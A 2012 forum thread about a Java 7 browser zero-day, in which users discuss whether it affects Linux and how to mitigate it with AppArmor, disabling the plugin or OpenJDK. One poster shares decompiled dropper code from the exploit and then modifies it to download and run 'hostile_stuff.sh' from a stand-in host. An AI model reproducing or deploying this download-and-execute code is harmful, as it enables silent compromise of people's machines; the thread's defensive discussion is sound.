| Java 7 0-day The newly discovered Java 7 0-day works on Linux (at least on the default install of Ubuntu 12.04). Tested it earlier with a VM and Metasploit. It works on both Firefox and Chromium (it bypasses the Chromium chroot sandbox, though I am not sure if Chromium sandboxes Java in the first place). However, I don't *think* it works with OpenJDK. At any rate, if you are using Oracle's official Java 7 in your browser, you can be compromised by merely visiting a malicious page (no user interaction required). Luckily, at least for Ubuntu users, Oracle's Java is not in the repos. You must install from a PPA.
I also tested it against the AppArmor profile that comes with Ubuntu and AppArmor killed it cold, so I highly recommend using AppArmor, SELinux or Grsec on a desktop box, at least for the browser. Unfortunately, Ubuntu no longer comes with the AppArmor profile enabled by default, so you have to do it yourself (and make a few tweaks to the profile).
And NX/ASLR/RELRO does not stop it since it doesn't work via memory corruption. It works on both 32 and 64 bit as well.
Since it may be a while before this is patched by Oracle, I thought I would give a heads up, especially since it is already in Metasploit. Obviously this means the script-kiddies will be running wild with it in no time.
The exploit doesn't get root, but that's not needed to connect to a remote server without one's knowledge.
It also affects Mac and Windows users too, of course.
--
Getting people to stop using windows is more or less the same as trying to get people to stop smoking tobacco products. They dont want to change; they are happy with slowly dying inside. -- munky99999 |
|
 JohnInSJPremium
join:2003-09-22
San Jose, CA
 ·PHONE POWER
 ·Comcast
| I've not seen a good description of what this does give you - access at the current user level for the login session that's running? What about firewalls?
--
My place : »www.schettino.us |
|
 timcuthBraves FanPremium
join:2000-09-18
Pelham, AL
 ·AT&T Southeast
| reply to KodiacZiller
Is there a way to prevent Java from executing without completely uninstalling it?
Is it just Java programming language, or Javascript, too? If in includes Javascript, it will break most web pages.
What are the current (as of right now, for this exploit) best practices for protection?
--
"Life is like this long line, except at the end there ain't no merry-go-round." - Arthur on The King of Queens
~ Project Hope ~ |
|
|
|
| said by timcuth:Is there a way to prevent Java from executing without completely uninstalling it? Not really unless you disable the plugin in the browser. Or you can, as I said above, use a MAC system like AppArmor or SELinux. Java 6 is not affected so that might be an option.
Is it just Java programming language, or Javascript, too? If in includes Javascript, it will break most web pages.
What are the current (as of right now, for this exploit) best practices for protection?
Of course, the chances of Linux being targeted are small, but still possible.
--
Getting people to stop using windows is more or less the same as trying to get people to stop smoking tobacco products. They dont want to change; they are happy with slowly dying inside. -- munky99999 |
|
timcuthBraves FanPremium
join:2000-09-18
Pelham, AL Reviews:
·AT&T Southeast
| said by KodiacZiller:Of course, the chances of Linux being targeted are small, but still possible.
Thanks for your answers.
Java is cross-platform, so I doubt it will make any difference to the exploit what host system is running.
Tim
--
"Life is like this long line, except at the end there ain't no merry-go-round." - Arthur on The King of Queens
~ Project Hope ~ |
|
 MaxoYour tax dollars at work.Premium,VIP
join:2002-11-04
Tallahassee, FL | reply to timcuth
said by timcuth:Is it just Java programming language, or Javascript, too? If in includes Javascript, it will break most web pages. Java and JavaScript are common in name only. |
|
Reviews:
·AT&T Southwest
| reply to KodiacZiller
»www.theregister.co.uk/2012/08/27···exploit/
quote:
In the form in which it was discovered, the exploit only works on Windows machines, because the payload that it downloads is a Windows executable. But the hackers behind the Metasploit penetration testing software say they have studied the exploit and found that it could just as easily be used to attack machines running Linux or Mac OS X, given the appropriate payload.
Which means no method has been found that involves Linux or Mac. |
|
1 edit | said by howardfine:http://www.theregister.co.uk/2012/08/27/disable_java_to_block_exploit/
quote:
In the form in which it was discovered, the exploit only works on Windows machines, because the payload that it downloads is a Windows executable. But the hackers behind the Metasploit penetration testing software say they have studied the exploit and found that it could just as easily be used to attack machines running Linux or Mac OS X, given the appropriate payload.
Which means no method has been found that involves Linux or Mac. Yeah, from my testing, the Metasploit exploit downloads a .exe to /tmp and then tries to execute it. Obviously a .exe won't run on a *nix box, but as the article points out, it would be trivial to change the payload to something *nix specific (like a shell script for instance).
You could always mount /tmp noexec, but that requires /tmp to be on its own partition. Also doing this will break a lot of apps.
The best option is to use Java 6, disable Java all together in the browser, or lock the browser down with a MAC system.
EDIT: Also it appears OpenJDK (Iced Tea) is not affected, so most Linux users are probably safe since most don't use Oracle's official Java anyway. Ubuntu took Oracle's Java out of its repositories a while back and now OpenJDK is what is installed.
--
Getting people to stop using windows is more or less the same as trying to get people to stop smoking tobacco products. They dont want to change; they are happy with slowly dying inside. -- munky99999 |
|
| said by KodiacZiller :Obviously a .exe won't run on a *nix box EEEEK! Halten Sie!
»www.winehq.org/
... the effects of which...
are unknown... |
|
Reviews:
·AT&T Southwest
| reply to KodiacZiller
said by KodiacZiller:it would be trivial to change the payload to something *nix specific (like a shell script for instance).
But how would that be executed without permissions?
@BBBanditRuR - Same answer. That was created with the Windows ABI and can't run on a *nix machine no matter how hard one tries. |
|
JohnInSJPremium
join:2003-09-22
San Jose, CA Reviews:
·PHONE POWER
·Comcast
| reply to KodiacZiller
said by KodiacZiller:said by howardfine:http://www.theregister.co.uk/2012/08/27/disable_java_to_block_exploit/
quote:
In the form in which it was discovered, the exploit only works on Windows machines, because the payload that it downloads is a Windows executable. But the hackers behind the Metasploit penetration testing software say they have studied the exploit and found that it could just as easily be used to attack machines running Linux or Mac OS X, given the appropriate payload.
Which means no method has been found that involves Linux or Mac. Yeah, from my testing, the Metasploit exploit downloads a .exe to /tmp and then tries to execute it. Which would run as the current user, even under windows - which should (if the user isn't running as Admin, or hasn't disabled UAC) raise all sorts of alarms if it does something needing permissions.
--
My place : »www.schettino.us |
|
| reply to howardfine
My point is that while it may not affect the running system, malicious software *could* run on it. |
|
| reply to KodiacZiller
Years ago I found it possible to eliminate Java from all my used OSes by switching to apps that don't reqire Java. So all related issues became forever nonexistent.
Naturally not everyone is able to do this but, if possible, it offers a permanent solution. |
|
MaxoYour tax dollars at work.Premium,VIP
join:2002-11-04
Tallahassee, FL | said by FF4m3 :Naturally not everyone is able to do this but, if possible, it offers a permanent solution. I've been to get rid of Sun Java on all but my work machine. I use SQL Developer for my database work. It runs horribly slow under OpenJDK/IcedTea. |
|
| reply to howardfine
Here is a snippet from the actual exploit code, those who are saying it fails to run on Linux are talking out their ass. It has Windows detection and calls chmod on a non-windows box. The xiaomaolv parameter defines the first-stage payload and could point to a shell script, a elf binary, etc. Folks, we run stuff in user-space; when your local user is owned, and it's the primary user you use to interface with the system, tell me again how this isn't a security concern? I'd prefer someone not snarf my ~/ if(bn.indexOf(k1) == 0 && si.indexOf(k2) == 0 && bs.intValue() == 748)
{
Object localObject1 = (new StringBuilder(String.valueOf(System.getProperty("java.io.tmpdir")))).append(File.separator).append("update.exe").toString();
downFile((String)localObject1, xiaomaolv);
if(str1.indexOf("Windows") 0)
exec((new StringBuilder("chmod 755 ")).append((String)localObject1).toString());
exec((String)localObject1);
(new File((String)localObject1)).delete();
}
Of course we could keep saying it doesn't work right? »www.youtube.com/watch?v=Ri_Uny-ZwYk |
|
Reviews:
·AT&T Southwest
| said by InTheKnow :Here is a snippet from the actual exploit code, those who are saying it fails to run on Linux are talking out their ass.
Well the article says it only has a Windows executable in it. There is another article around that says the same thing. I don't have time to mess with your code but how you are getting a Windows executable to run in Linux without permissions would be...unusual...to put it mildly. Not to mention doing so as non-root.
EDIT: I missed you are talking about running a script and not the executable from the malware but the same question comes about. You are saying you are able to download and execute this script as a non-root user which is highly questionable. |
|
JohnInSJPremium
join:2003-09-22
San Jose, CA Reviews:
·PHONE POWER
·Comcast
| I think he's saying he can download a script, chmod +x it, and run it as the current user. Which isn't exactly owning the box just yet. Next would be that the payload would execute a local root elevation (assuming you're not patched against the script kiddie list of exploits attempted in the payload)
So to recap you must be
1) dumb enough to run java in your browser (hey, it's 1998!)
2) running as root (OMG, like totally) or
3) running a system with known root elevation exploits or
4) l33t haxxors have you.
That seems to be right to me.
I think most linux users are going to be failing at 1. I think anyone with a brain should be failing at 1.
--
My place : »www.schettino.us |
|
| reply to howardfine
Respectfully, yes you can run the script as a non-root user, programmatically, just as any local user can, or a binary. Two lines of code and it can be made cross platform. I think folks are confusing the necessity of root access to "own" the system. I think we're arguing semantics here; unauthorized execution of code, even in the context of a local unprivileged user, is still "owning". If anything, owning the system as the local logged in user gives them access to the encrypted data stores typically unencrypted during login like ecryptfs/luks. Consider the below code, wee, look it's cross-platform: if(xiaomaolv == null && bn == null)
return null;
try
{
String k1 = "woyouyizhixiaomaol";
String k2 = "conglaiyebuqi";
String str1 = System.getProperty("os.name");
if(bn.indexOf(k1) == 0 && si.indexOf(k2) == 0 && bs.intValue() == 748)
{
Object localObject1 = (new StringBuilder(String.valueOf(System.getProperty("java.io.tmpdir")))).append(File.separator).append("update.exe").toString();
downFile((String)localObject1, xiaomaolv);
if(str1.indexOf("Windows") 0){
		 //Wee look at me, I affect not just Windows!!
		 (new File((String)localObject1)).delete();
downFile((String)localObject1, "http://www.example.com/hostile_stuff.sh");
exec((new StringBuilder("chmod 755 ")).append((String)localObject1).toString());
		}
exec((String)localObject1);
(new File((String)localObject1)).delete();
}
}
catch(Exception exception) { }
return null;
These are just code snippets, I'm not going to post the whole decompiled jar/class files. Let me say the assertions of: 1) People shouldn't run Java -- I'm sorry, this is assinine. Java is security horrid but there are enterprise applications that explicitly require it such as Juniper's VPN client on Linux. QuickJava is a pretty good answer for a Firefox plugin. 2) Running as root; yeah they should be flogged. 3-4) A simple wget script, running in a loop, backgrounded, makes a pretty damned good resource exhaustion attack for a bot-peer. C'mon guys, we see this crap already with the SSH scans and ownage of various unpatched web-apps on LAMP boxes. Connect-back shells, complex bot-peer Perl code, stripped ELFs, etc. You don't need root to bind an unpriv socket. Lets not be too dismissive of reality. As of now, even for Linux folks, it seems 1.6.0_u34 is the best answer or even better is OpenJDK IF it works with the enterprise applications. I'm half tempted to setup POC that fork-bombs folks who haven't setup limits.conf for nproc just as a POC to demonstrate that indeed Virginia, there is a security concern here. |
|
MaxoYour tax dollars at work.Premium,VIP
join:2002-11-04
Tallahassee, FL | reply to KodiacZiller
For those who may not know, I think it is important does not work by just having Java on your system. It must also be a browser plugin. You can install Java without giving your browser access to run it as a plug in. |
|
 SnakeoilIgnore Button. The coward's feature.Premium
join:2000-08-05
Mentor, OH
kudos:1 | reply to KodiacZiller
How does it work with Minecraft?  |
|
